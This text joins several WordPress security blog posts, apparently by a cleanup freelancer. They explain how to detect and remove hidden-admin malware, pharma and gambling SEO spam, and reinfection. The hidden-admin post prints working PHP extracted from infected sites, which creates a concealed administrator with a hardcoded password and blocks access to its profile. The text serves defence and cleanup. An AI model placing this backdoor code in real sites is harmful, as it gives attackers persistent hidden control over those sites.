This is why I treat any hidden admin discovery as a major incident, not a minor cleanup. Where there’s one stealth admin, there’s almost always more infection underneath.
The Anatomy of the Attack: How the Malware Actually Works
Modern hidden admin malware uses five interconnected techniques. Understanding each one is what lets you detect and remove it properly.
1. The Malware Creates an Administrator Account
This is the simplest part. The malicious code uses WordPress’s own legitimate user-creation function (wp_insert_user or wp_create_user) to create a new admin. From WordPress’s perspective, this is a normal API call — there’s nothing inherently malicious about it.
Real malicious code from a recent cleanup — this single block creates the adminbackup administrator with a hardcoded password.
Here’s actual code I’ve extracted from infected sites — this is the adminbackup variant that’s currently the most common:
$params = array(
'user_login' => 'adminbackup',
'user_pass' => 'o8Qcdaevd9', // Hardcoded password
'role' => 'administrator',
'user_email' => 'adminbackup@wordpress.org'
);
if (!username_exists($params['user_login'])) {
$id = wp_insert_user($params);
update_option('_pre_user_id', $id); // Save the ID for later hiding
}
The pattern is universal across variants:
Check if the rogue user already exists
If not, create it with administrator role and a hardcoded password
Save the new user’s ID in wp_options (typically as _pre_user_id) so the malware can reference it later
The username changes between variants. The most common ones I see:
adminbackup (extremely common in 2025–2026)
adm1nlxg1n — note the “1” instead of “i” and “g1n” instead of “gin”
support_user
sys_maint_service
help
codepapa
fallback_admin
wp_updater
2. The Malware Hides the User From Your Dashboard
This is the clever part — the part that makes the attack so hard to detect by visual inspection. The malware hooks into WordPress’s pre_user_query filter and modifies the database query before the dashboard runs it:
add_action('pre_user_query', function($user_search) {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id'); // The ID of the malicious user
global $wpdb;
// Inject SQL to exclude the malicious ID from results
$user_search->query_where = str_replace(
'WHERE 1=1',
"WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
$user_search->query_where
);
});
In plain English: the code tells the database “show me all users except the one with this specific ID.” The rogue admin still exists in wp_users. The dashboard just refuses to display the row.
That’s why the user appears invisible — and why you can’t find them through any normal WordPress interface, no matter how carefully you look.
3. The Malware Fakes the User Count
If the dashboard hid the rogue user but the count at the top still said “All (2)” instead of “All (1)”, the trick would be obvious. So the malware also modifies the count display:
The count gets mathematically reduced by 1 across the standard WordPress views (All, Administrator, etc.) so the math looks consistent. This is also where the malware makes its critical mistake — and how you can catch it.
4. The Mistake: Third-Party Plugin Counts
The attacker hardcodes the count-faking logic for WordPress’s built-in views — “All”, “Administrator”, “Editor”, etc. They don’t account for views added by third-party plugins.
So when a 2FA plugin adds its own “2FA Active” and “2FA Inactive” filter, the malware doesn’t know to subtract 1 from those counts. The result:
“Administrator (1)” — faked count, hides the rogue admin ✓
“2FA Inactive (2)” — real count, exposes the rogue admin ✗
This is why a 2FA plugin, an activity log plugin, or a security scanner often catches what WordPress’s own dashboard hides. If your numbers don’t match across different plugin counters, investigate immediately.
5. The Malware Protects Itself From Cleanup
The fifth technique is what makes deletion attempts fail. The malware also blocks direct access to the rogue user’s profile:
if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) {
wp_die(__('Invalid user ID.'));
}
If a savvy admin guesses the ID and tries to navigate directly to the user’s profile (e.g., user-edit.php?user_id=123), they get an “Invalid user ID” error. The malware also blocks deletion attempts and resets the password if it gets changed.
And the kicker: even if you somehow do delete the user, the creation logic from step 1 runs again on the next page load and recreates the account immediately.
Where the Malicious Code Hides
In real client cleanups, I find this code in five recurring locations. Knowing where to look is half the battle.
1. Theme functions.php
The most common location. functions.php runs on every page load, which gives the malware unlimited opportunities to recreate the user. Attackers append the malicious code to the end of the file or scatter it among legitimate theme code.
How to check: Open wp-content/themes/your-active-theme/functions.php via FTP or File Manager. Look for any code referencing wp_insert_user, wp_create_user, pre_user_query, views_users, or hardcoded usernames like the ones listed above.
2. wp-content/mu-plugins/
The “must-use” plugins folder. Files here are loaded automatically by WordPress before regular plugins, and they don’t appear in the standard Plugins list — making this folder a favorite hiding spot.
A clean WordPress installation does not have files in mu-plugins/ unless you or a developer deliberately put them there. Anything in this folder that you don’t recognize is suspicious by default.
3. Fake Plugin Folders
Attackers create fake plugin folders with names that sound technical and important. Recent examples I’ve found in real cleanups:
Fake plugin folders CacheFusion and CDNConnect — sitting alongside legitimate plugins, designed to look like infrastructure.
wp-compat (“WP Compatibility Patch”)
CacheFusion
CDNConnect
OperationGraph
DebugMaster
WP System Health Check
NexusGrid Performance Loader
Advanced Server Response Handler
These plugin names sound like infrastructure components site owners are afraid to delete. That fear is exactly what the attacker is exploiting. None of these are real plugins.
How to check: Open wp-content/plugins/ via FTP and review every folder. If a folder looks unfamiliar, hasn’t been updated through the WordPress admin, or has a recent “Last Modified” date when other plugins haven’t changed, treat it as suspicious. You’ll often see this in your plugin list as a plugin you don’t remember installing — but advanced variants also hide themselves from the plugin list using the all_plugins filter, so don’t trust the dashboard alone.
4. Disguised Core Files
Some attackers plant the backdoor as a fake WordPress core file. Names I’ve found in cleanups:
wp-user.php at the site root (real WordPress doesn’t have this file)
wp-l0gin.php — zero instead of “o”
wp-the1me.php — “1” instead of “i”
wp-scr1pts.php
lock360.php
How to check: Compare your WordPress core directory to a fresh download from WordPress.org. Anything in the root, wp-admin/, or wp-includes/ that doesn’t exist in the official version is suspicious.
5. Database-Injected Code
The most sophisticated variants store the malicious code as serialized PHP inside the WordPress database (typically in wp_options) and use a small loader file to retrieve and execute it on each request. This makes file-level cleanup particularly hard because removing the loader doesn’t remove the payload, and removing the payload from the database doesn’t help if the loader keeps regenerating it.
How to Detect Hidden Admin Users (4 Methods, Most Reliable First)
Don’t trust the WordPress dashboard alone if you suspect this attack. Use multiple detection methods.
Method 1: Check the Database Directly (Most Reliable)
This is the gold standard. Open phpMyAdmin (in your hosting control panel) or another database client, navigate to your WordPress database, and inspect the wp_users table directly:
SELECT ID, user_login, user_email, user_registered
FROM wp_users
ORDER BY user_registered DESC;
The query returns every user that exists in the database, regardless of any WordPress filters. Compare the list against what your dashboard shows. Any account you see in the database but not in the dashboard is a hidden user — almost certainly malicious.
Pay special attention to:
Usernames you don’t recognize
Email addresses on suspicious domains (@wordpress.org is a classic — WordPress.org doesn’t actually email users from this domain)
Recently registered admin accounts that shouldn’t exist
Accounts with no associated wp_usermeta activity (no posts, no logins recorded by activity plugins)
After spotting a suspicious user, check their role in wp_usermeta:
SELECT * FROM wp_usermeta
WHERE user_id = [SUSPICIOUS_USER_ID]
AND meta_key = 'wp_capabilities';
If the result shows administrator, you’ve confirmed a hidden admin.
Method 2: Check the User Count Discrepancy
This is the fastest way to spot the attack without leaving the WordPress dashboard. Look at multiple counters on your Users page:
If any of those numbers don’t match, you have a hidden user. Trust the third-party plugin counts — they’re harder for the malware to fake.
After removing the malicious code from functions.php, the previously invisible adminbackup user becomes visible in the dashboard.
Method 3: Use WP-CLI
If you have SSH access, WP-CLI commands give you a different view of the user list:
wp user list --role=administrator
Sometimes WP-CLI shows users that the WordPress dashboard hides, because the malware’s filters specifically target the wp-admin display layer. But this isn’t guaranteed — sophisticated malware can sometimes interfere with WP-CLI too. Use it as a diagnostic tool, but treat the database as your source of truth.
Method 4: Check Activity Logs and Login Records
If you have an activity log plugin installed (Simple History, WP Activity Log, etc.), review:
Recent user creation events
Recent admin logins from unfamiliar IPs
Recent role changes
Some activity log plugins record the creation event even if the user is later hidden — giving you a paper trail of when the attack happened and what username was created.
How to Remove a Hidden Admin User Safely (The Order Matters)
This is where most DIY cleanups fail. Do not delete the user first. If you delete the user before removing the malicious code, the code recreates them within seconds.
Step 1: Find and Remove the Malicious Code
Before touching the database or the user list, locate every file that contains the malicious code:
Open functions.php in your active theme — this is the most common location. Look for the patterns described above (hardcoded usernames, pre_user_query filters, views_users filters, wp_insert_user calls).
Check wp-content/mu-plugins/ — delete any file you don’t recognize.
Audit wp-content/plugins/ for fake plugin folders with the names listed above (or anything with a recent modification date when other plugins haven’t changed).
Compare core files against a fresh WordPress download to find disguised core files.
Search the database for serialized backdoor payloads in wp_options.
Remove every malicious file or code block. Don’t move on until you’re confident you’ve found them all — leftover code will recreate the user.
Refresh your WordPress Users page. If the malicious code was the only mechanism hiding the user, they should now appear in the list. If they don’t appear, you missed code somewhere — go back to Step 1.
Step 3: Delete the User
Once the user is visible and the malicious code is gone, delete the account:
Hover over the rogue user in the WordPress Users list
Click “Delete”
If prompted, attribute their content to another user (the rogue admin shouldn’t have any content, but WordPress asks anyway)
Confirm the deletion
If the dashboard delete doesn’t work, you can delete directly from the database:
DELETE FROM wp_users WHERE ID = [ROGUE_USER_ID];
DELETE FROM wp_usermeta WHERE user_id = [ROGUE_USER_ID];
Step 4: Rotate Credentials and Salts
The attacker had administrator access, which means they could read your wp-config.php, your database credentials, and any cached session data. Treat everything as compromised:
Change every WordPress admin password (force password reset for all users)
Change your hosting cPanel password
Change FTP/SFTP credentials
Change your database user password (and update wp-config.php to match)
Generate fresh WordPress security keys (salts) at api.wordpress.org/secret-key/1.1/salt/ and replace the corresponding lines in wp-config.php — this invalidates every active session, including any the attacker still has
Step 5: Patch the Original Entry Point
The attacker got in through something. If you don’t fix that, this entire process repeats next month. Common entry points:
An outdated plugin with a known vulnerability — update everything
Why Hidden Admin Users Keep Coming Back After Cleanup
I get this question constantly: “I deleted the user, the code, everything I could find — and it’s back two days later.” When this happens, one of these is true:
You missed code somewhere. Even one surviving copy of the malicious code recreates the user. Check functions.php, mu-plugins/, every plugin folder, theme files, and disguised core files.
There’s a backdoor PHP file you haven’t found. A separate file (often in wp-content/uploads/, named to look innocuous) that recreates the malicious code in functions.php when triggered.
A scheduled cron job is running the regeneration. WordPress cron, server cron, or both. Check wp_options for the cron entry and your hosting cPanel for unfamiliar scheduled tasks.
The attacker still has a separate admin account. Some attacks plant multiple stealth admins so removing one leaves another. Audit every admin in the database, not just the suspicious one you noticed first.
The original vulnerability is still open. The attacker simply re-exploits it and recreates the entire infection.
When you find a hidden admin, treat it as evidence of a broader compromise — not as the whole problem. The cleanup needs to address every layer.
FAQ
How do I know if my WordPress site has a hidden admin user?
The fastest signal is a user count discrepancy. If your “All Users” count says 1 but a 2FA plugin, activity log, or security scanner shows 2, you almost certainly have a hidden admin. Other warning signs include malware that keeps coming back after cleanup, unfamiliar admin login emails, sudden site behavior changes, and password resets you didn’t request. The most reliable confirmation is checking wp_users directly via phpMyAdmin.
Can WordPress malware really hide a user from my dashboard?
Yes — and it’s surprisingly straightforward technically. WordPress provides a filter called pre_user_query that lets any plugin (or any malicious code injected into a theme) modify the SQL query used to display users. Malware abuses this by adding AND ID != [hidden_id] to the query, excluding the rogue user from the dashboard while leaving them fully active in the database.
I deleted the hidden admin and it came back. Why?
Because the malicious code that creates the user is still on your server. Most variants check on every page load whether the rogue user exists, and recreate it if it doesn’t. You have to remove the malicious code first (typically in functions.php, mu-plugins/, or a fake plugin folder), then delete the user. Doing them in the wrong order doesn’t work.
What’s the typical username for a hidden admin user?
The most common ones I see in 2025–2026 cleanups are adminbackup, adm1nlxg1n, support_user, sys_maint_service, help, fallback_admin, and codepapa. Variants change frequently, but the pattern is consistent: usernames designed to look administrative or technical, often with subtle character substitutions (zero for “o”, “1” for “i”).
Can security plugins like Wordfence or Sucuri detect this?
Sometimes. Better security plugins detect the malicious code patterns (wp_insert_user with hardcoded credentials, pre_user_query filters that exclude specific IDs). But sophisticated variants use obfuscation, base64 encoding, or split the malicious functions across multiple files specifically to evade pattern-matching scanners. The user count discrepancy method I described above is more reliable than any single scanner.
Where does the malicious code that creates hidden admins usually hide?
In order of frequency: theme functions.php, wp-content/mu-plugins/, fake plugin folders with names like wp-compat, CacheFusion, or CDNConnect, disguised core files with names like wp-user.php or wp-l0gin.php (zero instead of “o”), and serialized payloads in the wp_options database table.
Should I just reinstall WordPress to get rid of this?
Reinstalling WordPress core helps but isn’t sufficient on its own. The malicious code is usually in the theme or a fake plugin, not in core files — so a core reinstall doesn’t touch it. The user accounts are in the database, which a core reinstall doesn’t replace either. A complete cleanup requires: (1) removing the malicious code from wherever it actually lives, (2) deleting the rogue user from the database, (3) reinstalling core/themes/plugins from clean sources, and (4) closing the original entry point.
How long has this attack been around?
The basic pattern (creating a hidden admin via functions.php code) has been documented since at least 2020. The adminbackup variant specifically has been spreading widely since 2024–2025, with Sucuri publishing a major analysis in mid-2025. The attack has evolved over time — adding self-protection logic, count-faking, plugin-list hiding, and database persistence — but the core technique remains the same.
Can I prevent this attack from happening?
Yes. The hardening that actually works: keep WordPress core, plugins, and themes updated; throw away nulled or pirated software; use strong unique passwords with two-factor authentication; disable file editing in wp-config (define('DISALLOW_FILE_EDIT', true);); install a Web Application Firewall; and set up file integrity monitoring that alerts on changes to functions.php. Most hidden admin infections trace back to a vulnerable plugin or a stolen password — close those gaps and the attack class becomes much harder.
Need Help With a Hidden Admin User on Your WordPress Site?
Hidden admin users are one of the highest-stakes findings in a WordPress security review. They mean an attacker has persistent administrator access — the kind that bypasses every cleanup attempt that doesn’t address the underlying code. In the past 18 months, I’ve found this exact attack pattern on hundreds of WordPress sites, ranging from small business blogs to high-traffic e-commerce stores.
If your dashboard counts don’t match, your malware keeps coming back after cleanup, or you’ve found suspicious accounts like adminbackup in your database, this is exactly the kind of incident I clean every week. I’ve recovered more than 4,500 hacked WordPress sites since 2018.
Did you recently check your WordPress database or source code and find strange, unreadable blocks of code? Perhaps you noticed your website ranking for keywords related to “Greek Pharmacy” or “andrikofarmakeio”?
If you found a script containing the ID M6bMm64IekltUmnGh3vrm9 or a function called oeYR5CtKOu7Yvb, your site has been compromised by a specific strain of SEO Spam Malware.
You are likely asking: What is this? Why is it there? And how do I get it out?
First: Verify This Is Your Infection
Clients often find us after seeing this specific block of code inside their wp_posts table (often appearing right after legitimate text):
If this matches what you see, stop editing immediately and read below.
What Is This Doing to My Business?
This is known as the “Greek Pharma Hack.”
Hackers haven’t just “broken” your site; they are parasitic. They are using your website’s good reputation to sell illicit products for a third party.
They are stealing your Google Authority: The code creates a “hidden link” to a Greek pharmacy website. The code uses a trick (top:-152413851px) to push the link 152 million pixels off-screen. You can’t see it, but Google can.
You face a Google Ban: Google’s bots are smart. They know this link is hidden (a technique called “Cloaking”). When they detect it, they will flag your site as “Deceptive.” Your legitimate pages will be de-indexed, and your traffic will crash.
It spreads automatically: This isn’t just in one post. This malware usually injects itself into hundreds or thousands of your database rows simultaneously.
Why You Can’t Just “Delete” It
If you are a business owner attempting to fix this yourself via phpMyAdmin, be very careful.
The malware inserts itself into the middle of your actual content (your blog posts, page text, and product descriptions).
The Risk: If you run a generic “Delete” command, you risk corrupting the formatting of your entire website, breaking images, and losing your original text.
The Re-infection: Deleting the code handles the symptom, not the cause. The hacker likely entered through a vulnerability in an outdated plugin or a weak password. If you delete the code without closing the door, they will simply re-infect you (often within hours).
How We Clean This For You
We specialize in removing SEO Spam Injections like the andrikofarmakeio variant.
Instead of risking your data, we perform a forensic cleanup:
Database Scrubbing: We use precise Regular Expressions (Regex) to surgically remove only the malicious ID M6bMm64IekltUmnGh3vrm9 and its associated script, leaving your legitimate content 100% intact.
Backdoor Removal: We hunt down the “shell” or rogue file the hackers are using to access your server.
Google Restoration: Once clean, we help you submit a “Reconsideration Request” to Google to get your rankings back on track.
Don’t let hackers siphon off your traffic.
If you see this code, contact us immediately for a specialized cleanup.
Quick answer: The first 72 hours after a WordPress malware cleanup are when most reinfections happen — not because hackers are persistent, but because cleanups miss things. This is a forensic verification protocol (not another cleanup checklist) built from over 4,500 real cleanups. You’ll run file-integrity checks, database scans, log audits, and credential rotations on a strict timeline so you can prove the site is clean — not just hope it is.
Most “after a hack” guides on the internet are recycled checklists: change passwords, update plugins, install Wordfence, done.
That is not what saves a site after a real-world hack.
After cleaning over 4,500 hacked WordPress sites on Upwork, Fiverr, and direct client work, I can tell you that cleanup is the easy part. Verification is what separates a permanent fix from a 48-hour relapse. The reason sites get re-hacked isn’t because hackers came back — it’s because the cleanup left a door open and the site owner stopped watching too soon.
This is the exact 72-hour protocol I run after every cleanup. Timeline-based. Command-driven. Built specifically to catch the things “remove malware and harden the site” advice never finds.
The 72-Hour Reinfection Window: Why Timing Matters
From the cleanups I have personally worked on, when a site gets reinfected, it almost always happens within the first three days after cleanup. Once you make it past the 72-hour mark with active monitoring in place, the chance of immediate reinfection drops dramatically.
Here is roughly how reinfection causes break down across the cases I have cleaned:
Missed scheduled tasks (cron jobs) that re-download malware on a timer
Hidden admin users sitting in the wp_users database table that no one checked
Backdoors hiding in non-obvious locations like mu-plugins/, wp-content/uploads/, or as fake plugin folders
Cached malware served by Cloudflare, Varnish, or a CDN even after the files are clean
Compromised hosting/FTP/database credentials the cleaner never rotated
None of those are caught by “the malware was removed” scans. They need verification, which is fundamentally different from cleanup. I cover the persistence mechanisms in detail in Why WordPress Malware Keeps Coming Back — this guide focuses on what to do once the cleanup is technically done, hour by hour.
The Mindset Shift: “Cleaned” vs “Verified”
A “cleaned” site means visible malware was removed. A verified site means you have proven, with evidence, that:
No backdoors are running silently
No hidden users have admin access
No scheduled tasks are armed to redownload malware
No cached version of the infection is still being served
No credentials the attacker had access to are still active
Most automated scanners only confirm the first point. The other four require manual forensic checks. That is what the next 72 hours are for.
Hour 0–1: The Lockdown (Force Everyone Out)
Before anything else, you have to assume every credential, cookie, and session associated with this site is compromised. Even if you changed the WordPress password, an attacker may still hold a valid login cookie.
Step 1: Rotate WordPress Salts (Kicks Out All Sessions)
Salts are the cryptographic keys WordPress uses to sign authentication cookies. Change the salts, and every existing logged-in session — including the attacker’s — becomes invalid instantly.
Save the file. Every active user session is now dead.
Step 2: Rotate the 5 Credentials That Matter
In order of severity:
Hosting control panel password (cPanel / Plesk / hosting login)
Database password — change it in cPanel, then update wp-config.php with the new value
SFTP / FTP user passwords for every account on the hosting plan
WordPress admin passwords for every admin-level user
Email account passwords tied to admin emails (often the original entry point)
If you skip the email account, the attacker can request a password reset and walk back in.
Step 3: Audit the User Table Directly
The WordPress dashboard does not always show every user account. Sophisticated malware hides admin users from the UI. The only reliable check is querying the database directly.
Open phpMyAdmin and run:
SELECT ID, user_login, user_email, user_registered
FROM wp_users
ORDER BY user_registered DESC;
Then verify the role of each user:
SELECT u.user_login, m.meta_value
FROM wp_users u
JOIN wp_usermeta m ON u.ID = m.user_id
WHERE m.meta_key = 'wp_capabilities';
Anything you do not recognize — especially anything with administrator in the meta value — gets deleted from both wp_users and wp_usermeta. I have documented exactly how attackers conceal admin accounts in Find and Remove Hidden Admin Users in WordPress.
Hour 1–6: File Integrity Forensics
The lockdown is done. Now you verify that no rogue files, modified core files, or backdoor scripts are sitting in the file system.
Step 4: Run a WordPress Core Checksum Verification
WordPress publishes MD5 checksums for every official core file. WP-CLI compares your installed files against those checksums and flags any mismatch:
wp core verify-checksums
Any file flagged here has been modified from its official version. There is no legitimate reason for a core file to be modified. If wp-includes/load.php or wp-admin/includes/file.php shows up — replace it from a fresh WordPress download immediately.
Verify plugins the same way:
wp plugin verify-checksums --all
Step 5: Hunt Recently Modified Files
If you do not have shell access, skip to Step 6. If you do, this single command finds every file modified in the last 7 days under your WordPress root:
Compare that list against your own activity. If you did not update plugins or change content, every modified file is suspicious. Pay special attention to:
wp-config.php
index.php in any directory (especially wp-content/, wp-content/plugins/, wp-content/themes/)
Any .php file inside wp-content/uploads/ — there is no legitimate reason for PHP to live in uploads
.htaccess in any directory
Step 6: Grep for Backdoor Signatures
Backdoors usually rely on a small set of PHP functions to execute remote code. This command lists every file containing one of those functions:
Some legitimate plugins use these functions, so expect false positives. Review the matches — anything in uploads/, anything with a randomly named file (e.g. x_8h7d.php), or any single-line PHP file is almost always malicious.
Step 7: Check the mu-plugins Folder
Must-Use plugins (wp-content/mu-plugins/) load on every page request and do not appear in the standard plugins list. Attackers love this folder. If you did not intentionally put files in there, the entire folder should be empty or non-existent.
ls -la /home/user/public_html/wp-content/mu-plugins/
Files can be clean while the database is still infected. Run these searches in phpMyAdmin against your wp_posts and wp_options tables:
-- Look for injected scripts in posts
SELECT ID, post_title
FROM wp_posts
WHERE post_content LIKE '%<script%'
OR post_content LIKE '%eval(%'
OR post_content LIKE '%base64_decode%';
-- Look for malicious autoloaded options (a common persistence trick)
SELECT option_name, LENGTH(option_value) AS size
FROM wp_options
WHERE autoload = 'yes'
ORDER BY size DESC
LIMIT 30;
The second query is the one most cleanup guides skip entirely. Attackers store payloads inside autoloaded option rows so they execute on every page load. Anything with a suspicious name (random characters, names like widget_cache_v2) and an unusually large value is worth investigating.
Step 9: Verify Site Behavior with curl (Not a Browser)
Browsers cache aggressively and may show you a clean version while real visitors still get the malicious one. Use curl to see the raw response your server actually sends:
# What desktop visitors see
curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" -L https://yoursite.com/
# What mobile visitors see (mobile-only redirects are common)
curl -A "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X)" -L https://yoursite.com/
# What Googlebot sees (cloaking attacks specifically target this)
curl -A "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" -L https://yoursite.com/
Compare the three responses. If the Googlebot response contains spam keywords, links, or a redirect that the desktop response does not — you have a cloaking infection that survived the cleanup. This is exactly how Japanese keyword hacks evade detection; my full breakdown is in The Japanese Keyword Hack: Detection, Removal, and Prevention.
Step 10: Purge Every Layer of Cache
“My site shows the warning even though I cleaned it” is almost always a cache problem. The order matters:
WordPress cache plugin (WP Rocket / W3 Total Cache / LiteSpeed) — purge all
Server-level cache (NGINX FastCGI, Varnish, LiteSpeed) — flush from the hosting panel
Object cache (Redis, Memcached) — restart or flush
Browser cache — test in incognito and on a device that has never visited the site
Day 1–3: SEO Damage Audit
This is the part most cleanup guides skip entirely, and it is the part that costs site owners the most money long-term. Even if your files are clean, Google may still have thousands of spam URLs from the hack indexed under your domain.
Step 11: Check Google Search Console for Manual Actions
Log in to Google Search Console and check:
Security Issues tab — if there is a banner, you are still flagged. Don’t request review yet; do the rest of this audit first.
Manual Actions tab — separate from Security Issues; covers spam penalties.
Pages → Indexing report — sort by date. A spike in indexed URLs means hacker-created spam pages are still in Google’s index.
Step 12: Find and De-Index Spam URLs
Run this Google query to see what spam URLs are indexed under your domain:
For each spam URL that returns a 404 (the cleanup deleted the malicious page), submit it to Google’s Removals tool in Search Console. For URLs you cannot find an obvious match for, check your sitemap and re-submit a clean one. I documented exactly how I removed 10,500 spam URLs in 12 days here — the same playbook applies to any volume.
If you are stuck in a blacklist loop, my blacklist removal service handles the review submissions and re-scan management end-to-end.
Day 3–7: Behavioral Monitoring
The first three days verify the cleanup. The next four watch for reinfection signals.
Step 14: Audit Cron Jobs (WordPress and Server Level)
WordPress cron and server cron are different things. Both can be hijacked.
For WordPress cron, install WP Crontrol and review the events list. Look for:
Hooks with random names (xys_check_update, wp_eval_payload)
Hooks scheduled to run very frequently (every 5–10 minutes)
Hooks with no associated function
For server cron (if you have SSH):
crontab -l
# And for the web user
crontab -u www-data -l
Anything calling a PHP file in wp-content/uploads/, anything with wget or curl downloading remote files, anything with a base64-encoded string — kill it immediately. I cover cron-based reinfection in depth in WordPress Cron Job Malware.
Step 15: Watch Server Access Logs for Probing
Attackers who got in once usually probe again to see if their backdoors still work. Watch the access log for repeat hits to the locations they used:
Repeated requests from the same IP across a short time window
Step 16: Re-Scan with a Different Tool Than the One That Found It
Each scanner has blind spots. If Wordfence cleaned the site, run a Sucuri SiteCheck and a MalCare scan. If MalCare did the cleanup, run Wordfence. Different signature databases catch different things.
Week 1+: Long-Term Monitoring Setup
Past 72 hours, the goal shifts from active verification to passive monitoring. Set up the following so the next attempt is caught before it becomes another cleanup:
If any of these show up in the 72-hour window, the cleanup was incomplete and you are already being reinfected:
A new admin user appears in wp_users that you did not create
Files you deleted reappear (almost always a cron job)
Server CPU spikes for no obvious traffic reason
Search Console flags new spam URLs being indexed
The siteurl or home values in wp_options change on their own
Mobile visitors get redirected but desktop does not
Your hosting provider sends a fresh malware notice
If any of these happen — stop trying to clean it incrementally. The infection is regenerating from a backdoor you have not found, and continuing to react keeps you behind the attacker. Get a forensic audit instead.
Frequently Asked Questions
How do I know if my WordPress malware cleanup actually worked?
Run the seven verification checks in this guide: salt rotation, credential rotation, hidden user audit, core checksum verification, modified file scan, database scan, and curl-based behavioral testing. If all seven pass and the site is still clean 72 hours later, the cleanup held.
How long should I monitor my WordPress site after a hack?
Active monitoring for 72 hours, passive monitoring for 30 days. The first three days catch immediate reinfection from missed backdoors; the next 27 catch slower attacks that wait out your initial vigilance.
Why does my WordPress site keep getting hacked even after I clean it?
You are missing the persistence mechanism. The most common ones are scheduled cron jobs that re-download the malware, hidden admin users in the database, or a backdoor file in mu-plugins or uploads. I cover the full breakdown here.
Should I rebuild my WordPress site from scratch after a hack?
Only if your backups are also infected or older than the hack itself, or if cleanup keeps failing despite multiple attempts. A clean rebuild is sometimes faster than chasing a determined infection — but for the vast majority of cases, a verified manual cleanup is enough.
Do I need to tell Google my site was hacked?
Only if Google flagged you with a Security Issue in Search Console. Otherwise, requesting a review draws attention to a problem Google may not have noticed. Clean the site, verify it is clean, then continue submitting your normal sitemap. If a flag does exist, request the review only after every step of this protocol passes.
Can a hosting provider tell me my site is clean?
They can tell you their scan did not find malware, which is not the same thing. Hosting scans look for signature-based file infections; they rarely check the database, hidden users, cron jobs, or behavioral cloaking. Treat a “your site is clean” notice from your host as one data point, not a final answer.
Need a Forensic Audit Instead of a Checklist?
If your cleanup keeps failing, if malware keeps coming back, or if you just want a second set of expert eyes on a site you have already cleaned — that is exactly what I do. I have personally cleaned and verified over 4,500 hacked WordPress sites.
Real reviews from clients I have worked with:
“I’m very satisfied with MD Pabel service. He can save my site from hackers and remove all malware attacks. Highly recommended.”
— Hassan Infinkey, eCommerce Owner ★★★★★
“My website was suffering from some redirect malware. MD was able to take care of the problem for a reasonable fee. For me, he was a lifesaver. I will certainly go to him first should something like that happen again.”
— Kendall Miller, Founder ★★★★★
“Thanks for giving me a great support. You are a very nice team.”
— Usama Javed, WordPress Agency ★★★★★
We recently worked on a WordPress site that had a serious problem. To the owner, the site looked fine. But to Google and new visitors, it was completely broken.
Visitors were being sent to a fake “Cloudflare Verification” page, and Google was indexing thousands of spam links for illegal gambling sites. This is a very common but advanced type of hack.
In this post, I will explain exactly what we found. I will break down the malicious files (wp-compat.php, OperationGraph.php, and main.php) and show you the steps we took to clean the site. If you have a WordPress site, this guide will help you understand how hackers hide in your system.
1. The Problem: How We Detected the Hack
The client contacted us because their traffic had dropped significantly. They also received complaints that their site was “unsafe.”
When we started our investigation, we found three main symptoms.
Symptom A: The Fake Cloudflare Page
Occasionally, when we tried to visit the site, we were redirected to a page that asked us to “Verify you are human.”
It looked like a standard security check from Cloudflare. However, when we looked at the URL bar, the address was not cloudflare.com. It was a fake page hosted on the client’s own website.
Why hackers do this:
This is a phishing trap. If you click the “Verify” button, the script often tries to install a virus on your computer or tricks you into allowing browser notifications (which they use to send you spam ads later).
Symptom B: Hidden SEO Spam (The Source Code)
When we looked at the website normally, the footer looked clean. But hackers are smart—they know that if they put spam links where you can see them, you will delete them.
We right-clicked the page and selected “View Page Source.”
At the very bottom of the HTML code, we found thousands of links. They linked to:
“Bahsegel” (Betting/Gambling sites)
Crypto scams
Adult content
The hackers used a simple trick to hide these links from humans. They used CSS code to push the links far off the screen:
By setting the position to -11738px, the links are physically located miles to the left of your monitor. You can’t see them, but Google’s bots read the code, not the screen. Google sees these links, thinks your site is promoting illegal gambling, and penalizes your search rankings.
Symptom C: Strange Plugins
We logged into the hosting File Manager. In the /wp-content/plugins/ folder, we saw many folders. Most were real, but three stood out because they had generic, “boring” names that didn’t match any known plugin.
2. Analyzing the Malware: The “Fake Plugin” Trio
We downloaded the suspicious files to analyze them. The hackers installed three specific scripts. Each one had a specific job.
Malware File #1: The Ghost Admin Creator
File Name:wp-compat.php
Fake Name: WP Compatibility Patch
Location:/wp-content/plugins/wp-compat/
This file is very dangerous. Its job is to make sure the hackers always have an administrator account, even if you delete them.
What the code does:
The code claims to be a “Compatibility Patch” to fix issues with WordPress. This is a lie to make you afraid to delete it.
This script runs every time the website loads. It checks if a user named adminbackup exists. If you delete this user, the script immediately recreates it with the password QetmUvqCTs.
How it stays invisible:
The most clever part of this script is that it hides the user from the WordPress Dashboard.
It uses a command called pre_user_query. This command tells WordPress: “When you list the users in the dashboard, do not show the user ID associated with adminbackup.”
So, you could look at your Users list and see 3 legitimate admins. But in reality, there are 4 admins. The 4th one is the hacker, and they are invisible to you.
This file was located in a folder that sounded real (woocommerce-page-homepage), but it was actually a “backdoor.” A backdoor is a script that lets hackers send commands to your website remotely.
What the code does:
The code in this file was “obfuscated.” This means the hackers wrote it in a way that is impossible for humans to read easily.
It uses chaotic jumps (goto commands) and weird codes. This script connects your website to a “Command and Control” server. The hackers can send a signal to this script to tell your website to do anything they want, such as:
Download more viruses.
Delete your files.
Send spam emails.
It also saves its settings in your database (the wp_options table) so that even if you delete the file, the settings remain.
This script was responsible for the SEO spam links we found in the source code.
What the code does:
This script turns your website into a “Zombie” that works for the hackers. It uses a technique called Cloaking.
Cloaking means showing one version of the site to real humans and a different version to search engines (like Google or Bing).
Detection: When someone visits your site, the script checks who they are. It has a list of IP addresses for Google, Bing, and Yandex bots.
The Switch:
If you are a human: It shows the normal site (or the fake Cloudflare redirect).
If you are Googlebot: It connects to a hacker website (pasteyourlinks.online), downloads a list of spam links, and inserts them into your page.
This is why the site owner often doesn’t realize they are hacked. They browse the site and see nothing wrong. But Google browses the site and sees thousands of links to “Casino” and “Betting.”
Clearing the Cache:
We also noticed this script commands your caching plugins to clear themselves.
if (function_exists('rocket_clean_domain')) {
rocket_clean_domain();
}
It clears WP Rocket, LiteSpeed, and W3 Total Cache. Why? Because if your site is cached, the spam links might not show up immediately. The hackers want the spam to be live instantly.
3. Why This “Japanese Keyword Hack” Matters
